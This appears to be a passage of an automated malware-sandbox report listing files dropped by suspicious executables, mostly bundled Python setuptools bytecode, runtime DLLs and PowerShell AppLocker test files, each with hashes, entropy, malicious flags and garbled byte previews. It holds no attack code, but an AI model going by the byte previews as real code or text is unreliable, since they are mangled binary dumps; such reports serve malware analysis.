                                                                                                                                            Preview:...........el..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.......................d.k.....r.d.d.l.Z.d.d.l.m.Z...n...G.d...d...............Z...e...............Z.d...Z.d...Z.d.d.d.d.d...Z.d...Z d...Z!d...Z"d...Z#d#d...Z$..G.d...d...............Z%..G.d...d...............Z&..G.d...d ..............Z'..G.d!..d"..............Z(d.S.)$a.....Improved support for Microsoft Visual C++ compilers...Known supported compilers:.--------------------------.Microsoft Visual C++ 14.X:. Microsoft Visual C++ Build Tools 2015 (x86, x64, arm). Microsoft Visual Studio Build Tools 2017 (x86, x64, arm, arm64). Microsoft Visual Studio Build Tools 2019 (x86, x64, arm, arm64)..This may also support compilers shipped with compatible Visual Studio versions.......N)...open)...listdir..pathsep)...join..isfile..isdir..dirname)...LegacyVersion)...unique_everseen.....)...get_unp

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\namespaces.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5687
                                                                                                                                            Entropy (8bit):5.225568242708696
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b+iObeBEZtPf7cEbYDKg7SgOTO5AHhOloXNWZWhm2RyBQhhjrlU0LxT:yj97c9Kg2gOTOiwadWZ1ZBQhBlzxT
                                                                                                                                            MD5:3DC27E0EB150CD13E06DEEA29E504007
                                                                                                                                            SHA1:FE16FDB611B719025755B292ABC95CB8B1A4D3FB
                                                                                                                                            SHA-256:427046D2219B28D9A3677C4F464F7DF174058C77C9FB6E311FE1AF0BDDE1F1E7
                                                                                                                                            SHA-512:1230A632B6FC89D8346E4234E3309754D60474EFA8B6722589BB639AF4572EC906F0F7BF53E594ED4894ED47E19E0AEF967B520754DB44452C9C75A5A9C72371
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................p.....d.d.l.Z.d.d.l.m.Z...d.d.l.Z.e.j.........j.........Z...G.d...d...............Z...G.d...d.e...............Z.d.S.)......N)...logc.....................X.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.Z...d.Z...d...Z.d...Z.d...Z.e.d.................Z.d.S.)...Installerz.-nspkg.pthc...........................|.....................................}.|.s.d.S.t...........j...............................|...................................................\...}.}.|.|.j.........z...}.|.j...............................|.................t...........j.........d.|.................t...........|.j.........|...............}.|.j.........r.t...........|.................d.S.t...........|.d...............5.}.|.......................|.................d.d.d.................d.S.#.1.s.w.x.Y.w...Y.....d.S.).Nz.Installing %s..wt)..._get_all_ns_packages..os..path..splitext.._get_target..nspkg_ext..outputs..appendr......info..map.._gen_nspkg_line..dry_run..list..open..writelines)...sel

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\package_index.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60782
                                                                                                                                            Entropy (8bit):5.296108418233854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:t6bnZDTPLyL3ar5c8/Lj5zZPuIPUbowrQLayYQcekHid6kDqjO5KoRdWOv9wKZ:OTNzPumUMWKkjtvGXRkOv2KZ
                                                                                                                                            MD5:8F51FCD23A44AF25EB625AA1A546BB81
                                                                                                                                            SHA1:27993AE04A6D541BCD2A1029156EDBD512A42AF0
                                                                                                                                            SHA-256:7F08B64D5322F2CEE582C5F9A03D60E07FBA79EDD029D05C2B4CFC156A76D560
                                                                                                                                            SHA-512:0BE3D801742ECCE5B28948C93772C922EBBD7619A2BC2E9572DD6AFC523E3D8CD242D92A501281D759052611D2F8D5BCB29A8582B6586F6D533F5F3C053BA7B8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eT...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z.....e.j/........d...............Z0..e.j/........d.e.j1......................Z2..e.j/........d...............Z3..e.j/........d.e.j1......................j4........Z5d..6..................................Z7g.d...Z8d.Z9d.Z:e:.;......................d.j;........e.j<..........e.................Z=d...Z>d...Z?d...Z@d1d...ZAd1d...ZBd1d...ZCd.e.d.f.d...ZDd...ZE..e.j/........d.e.j1......................ZFeEd.................ZG..G.d...d...............ZH..G.d ..d!eH..............ZI..G.d"..d#e...............ZJ..e.j/........d$..............jK........ZLd%..ZMd&..ZNd2d'..ZOd(..ZP..G.d)..d*..............ZQ..G.d+..d,e.jR......................ZSe.jT........jU........f.d-..ZVd...ZW....eOe9....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\py34compat.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):742
                                                                                                                                            Entropy (8bit):5.2466983752993
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:B2wQv/yUtC6tk9K4I1R/2IpRVRdyDoJnPGnwPjsKtZ7jOt4vR5xxxxxfm/n:IwQ6Uc6WX452m1y2PGnw/tZ3Otyjm/n
                                                                                                                                            MD5:0F8108E574032A0D57E82586A2B845C9
                                                                                                                                            SHA1:13D16882F6216A626D241EED6DB356E8C02D7A1A
                                                                                                                                            SHA-256:2CF3736F484FAC415E943611D47E2DB296DBA7865EBBEF0683D4E9635C9B5308
                                                                                                                                            SHA-512:A6CA4B3DE88C385FF6DDEE52D041FBF81300D1F8750DCD91338C320320F2CF392DB081468416C71CD95EDF3CFD4D357FF576DCDB484B8913259E41310C869A76
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................h.....d.d.l.Z...d.d.l.Z.n.#.e.$.r...Y.n.w.x.Y.w...e.j.........j.........Z.d.S.#.e.$.r...d...Z.Y.d.S.w.x.Y.w.)......Nc.....................@.....|.j...............................|.j.......................S.).N)...loader..load_module..name)...specs.... .iC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\py34compat.py..module_from_specr........s..........{..&..&.t.y..1..1..1.....)...importlib..importlib.util..ImportError..utilr......AttributeError..r....r......<module>r........s................................................................D............2.. .~..6.................2....2....2....2....2....2....2....2....2....2...s..................%...1...1.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\sandbox.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27358
                                                                                                                                            Entropy (8bit):5.338918108301592
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:dB3nhYEo+wjuuuXuuMijM5tiiRA+lhxV+:Lhdo+wjuuuXuup8zOEV+
                                                                                                                                            MD5:CEB458C960CD25376391499672F35E1D
                                                                                                                                            SHA1:6C2916CDB897D84F8B59F664DFA2D4268A70DC5D
                                                                                                                                            SHA-256:F69E264845364E6FEFB55ED2AA4587E3248B9C0E658BE44AF29AC0D90B0F6C18
                                                                                                                                            SHA-512:F4AC63D0102F467D2F209E5CA28514E5FDE605EB9FE89B1B4EB1AC9E6778B4636AE775B83DAC9EF14498391C3237790F6569BD64099588273212308DCF875510
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.8........................H.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...............................d...............r.d.d.l.m.c...m.c...m.c...m.Z...n.e.j.........e.j...................Z...e.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.e.Z.g.d...Z.d d...Z.e.j.........d d.................Z e.j.........d.................Z!e.j.........d.................Z"e.j.........d.................Z#..G.d...d.e$..............Z%..G.d...d...............Z&e.j.........d.................Z'd...Z(e.j.........d.................Z)e.j.........d.................Z*h.d...Z+d...Z,d...Z-d...Z...G.d...d...............Z/..e0e.d...............r.e.j1........g.Z2n.g.Z2..G.d...d.e/..............Z3..e.j4........e.j5........d...d..6..................................D.............................Z7..G.d...d.e...............Z8d.S.)!.....N)...DistutilsError)...working_set..java)...AbstractSandbox..DirectorySandbox..SandboxViolation..run_setupc....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\script (dev).tmpl

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):218
                                                                                                                                            Entropy (8bit):4.933979931150322
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:SWtKjcyXrvEXFov66Ji+DqMedPKejpCYI+dLC9:nKZJvVEPLlClOLC9
                                                                                                                                            MD5:762D226E24C456568A2F4305151094BE
                                                                                                                                            SHA1:982302A6A5664F02C8CC87407DC7F2F5B5FBD825
                                                                                                                                            SHA-256:454CD0CC2414697B7074BB581D661B21098E6844B906BAAAD45BD403FB6EFB92
                                                                                                                                            SHA-512:AB81BAF791AAFBA3391DFC0EBD32A87EC4820E044BC5CF53FAD7D27DABFA87D4979F76164EF017B3F5FD3DAEE544BF724B67D01E0EF8B72B6FA3223E5F23DD48
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# EASY-INSTALL-DEV-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').require(%(spec)r).__file__ = %(dev_path)r.with open(__file__) as f:. exec(compile(f.read(), __file__, 'exec')).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\script.tmpl

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138
                                                                                                                                            Entropy (8bit):4.782879665178461
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:SWsiKQ3shBMZoWGXrWWbpW6iFoqM/66JiWOQfDBWVSEqbZhGbWWun:SWtKQXyXrvEXFov66Ji+DgVSEqlhGban
                                                                                                                                            MD5:C7C13D61B7887915BFC911031126AF09
                                                                                                                                            SHA1:FA9B9F2E89357C8597490720B623D3B875136773
                                                                                                                                            SHA-256:5864EDE6989ECCEDBB73E0DBC7A9794384F715FDB4039CFBF3BDA1BF76808586
                                                                                                                                            SHA-512:1E115F1555DA61D2EF330FDE94010A0138C4D761342EA02B109B21F11F2E4EE59243B4137CB72FAFDF2347A4C56CE453E239E838E446EFD01A69706D25B6FBA0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# EASY-INSTALL-SCRIPT: %(spec)r,%(script_name)r.__requires__ = %(spec)r.__import__('pkg_resources').run_script(%(spec)r, %(script_name)r).

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\unicode_utils.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1844
                                                                                                                                            Entropy (8bit):5.204041146560013
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:0u+xOuN2mNrV7NF3A9KxCI5UNPN5zCZoqZMA3Xm:3juhBxZ8sl5oPN5GKqZpXm
                                                                                                                                            MD5:8849C94D76261B6AEB7BC1DA40AEAE63
                                                                                                                                            SHA1:FDAD0B7BE64C992F3128841C7367F8FFC5C71E7A
                                                                                                                                            SHA-256:9253E76BE0645C87783CD7D9F225F9A636834726887AD5ECC536F04C4A136434
                                                                                                                                            SHA-512:7DEB39BBA00A7E8BB80618B874ED48CEFC09A5FBD24517ABA785EAA4A6CE8EF142D210217DA9647CA65C01A04DB628D51AFC709C1EFBC437DCF756A035A6E185
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................(.....d.d.l.Z.d.d.l.Z.d...Z.d...Z.d...Z.d.S.)......Nc...........................t...........|.t.........................r.t...........j.........d.|...............S...|.......................d...............}.t...........j.........d.|...............}.|.......................d...............}.n.#.t...........$.r...Y.n.w.x.Y.w.|.S.).N..NFD..utf-8)...isinstance..str..unicodedata..normalize..decode..encode..UnicodeError)...paths.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\unicode_utils.py..decomposer........s..........$............2.....$.U.D..1..1..1.........{.{.7..#..#.......$.U.D..1..1......{.{.7..#..#........................................Ks.....?A,..,.A9..8.A9.c..........................t...........|.t.........................r.|.S.t...........j.......................p.d.}.|.d.f.}.|.D.])}...|.......................|...............c...S.#.t...........$.r...Y..&w.x.Y.w.d.S.).zY. Ensure that t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\version.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):462
                                                                                                                                            Entropy (8bit):5.411779876215473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Bd//3IcPWCLO/2IpRVpy5agAj3VbTVdVd93m00MUM0:vXYcPWj2mlgALV3VdVd9200MUM0
                                                                                                                                            MD5:51976287C64F1F4503EB5B3C9D920D1D
                                                                                                                                            SHA1:B1C80570F63CB34E6BB303BCE14058B60A35D481
                                                                                                                                            SHA-256:29EC6148F9805FB51E6E8BD90A77011F55097F6F4B14A1E87F6A8831D89EFC6D
                                                                                                                                            SHA-512:46365B50CC2B0F4C8EA96A65B68B5397711DC3078429FE2C3DF2B5C5D4C3944F9B71EBF1D7B797A3B0612D2B66AF2BEBF5CC05C17FB12C60B6B79A96A9853BD8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................V.....d.d.l.Z.....e.j.........d...............j.........Z.d.S.#.e.$.r...d.Z.Y.d.S.w.x.Y.w.)......N..setuptools..unknown)...pkg_resources..get_distribution..version..__version__..Exception........fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\version.py..<module>r........sU...........................0.-..0....>..>..F.K.K.K.......................K.K.K.K........s..........(...(.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\wheel.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15518
                                                                                                                                            Entropy (8bit):5.159095610497636
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:auKPGbBtXNsJqLdid59p2ADrynMxlTlDXqP4ZhsJ:auKUB8GduD4A1ThXqQZ2J
                                                                                                                                            MD5:5FB2E502BAE4E31B8F178EB7479864FF
                                                                                                                                            SHA1:CF6F575553D6400C405D553FCB1D7A83687C6DD1
                                                                                                                                            SHA-256:2D972E462E71A8CBC56674FB5B6EA8F81166B96BEB36B201C14F9A223F5C9DE1
                                                                                                                                            SHA-512:AF99F1CB660C027306E62CB2700279B34C34A335EDD23C7882BC5F806B9848A6D2C3B1C1A37B6F09B09094A42D9802BC08D902D71980061808F5A15CE9E1591B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e. ..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d.e.j.......................j.........Z.d.Z.d...Z.e.j.........d.................Z...G.d...d...............Z.d.S.).z.Wheels support......N)...get_platform)...parse_version)...sys_tags)...canonicalize_name)...write_requirements)..._unpack_zipfile_objz.^(?P<project_name>.+?)-(?P<version>\d.*?). ((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?). )\.whl$z8__import__('pkg_resources').declare_namespace(__name__).c...........................t...........j.........|...............D...])\...}.}.}.t...........j...............................|.|...............}.|.D.]X}.t...........j...............................|.|...............}.t...........j...............................|.|.|...............}.t...........j.........|.|..................Yt...........t...........t...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\windows_support.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1459
                                                                                                                                            Entropy (8bit):5.379116763081545
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Qk+Ia6LyBPU2mL+lLLgVcvZ1NbAMby8nMNvtTx9:Qk+bIT2mL+gmZ1LOhNFTx9
                                                                                                                                            MD5:33C938D33990B726C240197713A3E7E5
                                                                                                                                            SHA1:B6C442B5705840C1187C9BF438A897FD15AAED42
                                                                                                                                            SHA-256:7D150263D41BFBFC89AFB4922D5AD69C732F55DD06A6DF596B246DA1958CBBD5
                                                                                                                                            SHA-512:18E2DD7FC3C2635A7AABDDBA1DEFD1CC9EF35A92F479D572CB4D6A7583316E7520F8CC30D2AE54EC85946AC9671A134A9FE0B89355F0941EA406995C2C67E2FB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................*.....d.d.l.Z.d...Z.e.d.................Z.d.S.)......Nc.....................:.....t...........j.......................d.k.....r.d...S.|.S.).N..Windowsc...........................d.S.).N..)...args..kwargss.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\windows_support.py..<lambda>z.windows_only.<locals>.<lambda>....s.......t.......)...platform..system)...funcs.... r......windows_onlyr........s#.................I..%..%..+..+..+....Kr....c...........................d.d.l.}.t...........d.................|.j.........j.........j.........}.|.j.........j.........|.j.........j.........f.|._.........|.j.........j.........|._.........d.}...|.|.|...............}.|.s.|.......................................d.S.).z.. Set the hidden attribute on a file or directory... From http://stackoverflow.com/questions/19622133/.. `path` must be text.. r....Nz.ctypes.wintypes.....)...ctypes..__import__..windll..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\python3.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):67352
                                                                                                                                            Entropy (8bit):6.146621901948148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                            MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                            SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                            SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                            SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%{..a.e.a.e.a.e..fm.`.e..fe.`.e..f..`.e..fg.`.e.Richa.e.........................PE..d......d.........." ...".................................................................`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\python311.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5762840
                                                                                                                                            Entropy (8bit):6.089392282930885
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                            MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                            SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                            SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                            SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\vcruntime140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):89880
                                                                                                                                            Entropy (8bit):6.5375654036547255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:fTSVLL1/VfZPtsO6nBy0r8Z3j5X7K0d4HIH8d2//zoXnf7toecbNCOAS7Z:fW/tB8n8F4i/LoXfeecbNCA
                                                                                                                                            MD5:23105A395B807D9335219958B4D0CEC1
                                                                                                                                            SHA1:FB60050D82E3BC1BE3B10877B9355F5D48E04854
                                                                                                                                            SHA-256:61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5
                                                                                                                                            SHA-512:EF91D19E632D0D146FA68D52BEB04FFCB9B972079CD9C255F44EA5201637A8B00907EC8E3358C7B5CC37338470E29E43DBAEC7DDC0562810B49AB2E8115CC805
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8O.q|.."|.."|..".)"~.."uVU"w.."|.."P..".C.#p..".C.#l..".C.#b..".C.#}..".C9"}..".C.#}.."Rich|.."................PE..d....h.].........." .........Z...............................................p......y$....`A............................................4............P.......0...........A...`......0...8...........................p................................................text............................... ..`.rdata...<.......>..................@..@.data........ ......................@....pdata.......0......................@..@_RDATA.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ww23vje.edq.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fwjkab5r.433.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4t5s2jm.3yd.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4gsjwux.15m.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl1xwjvu.5w3.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
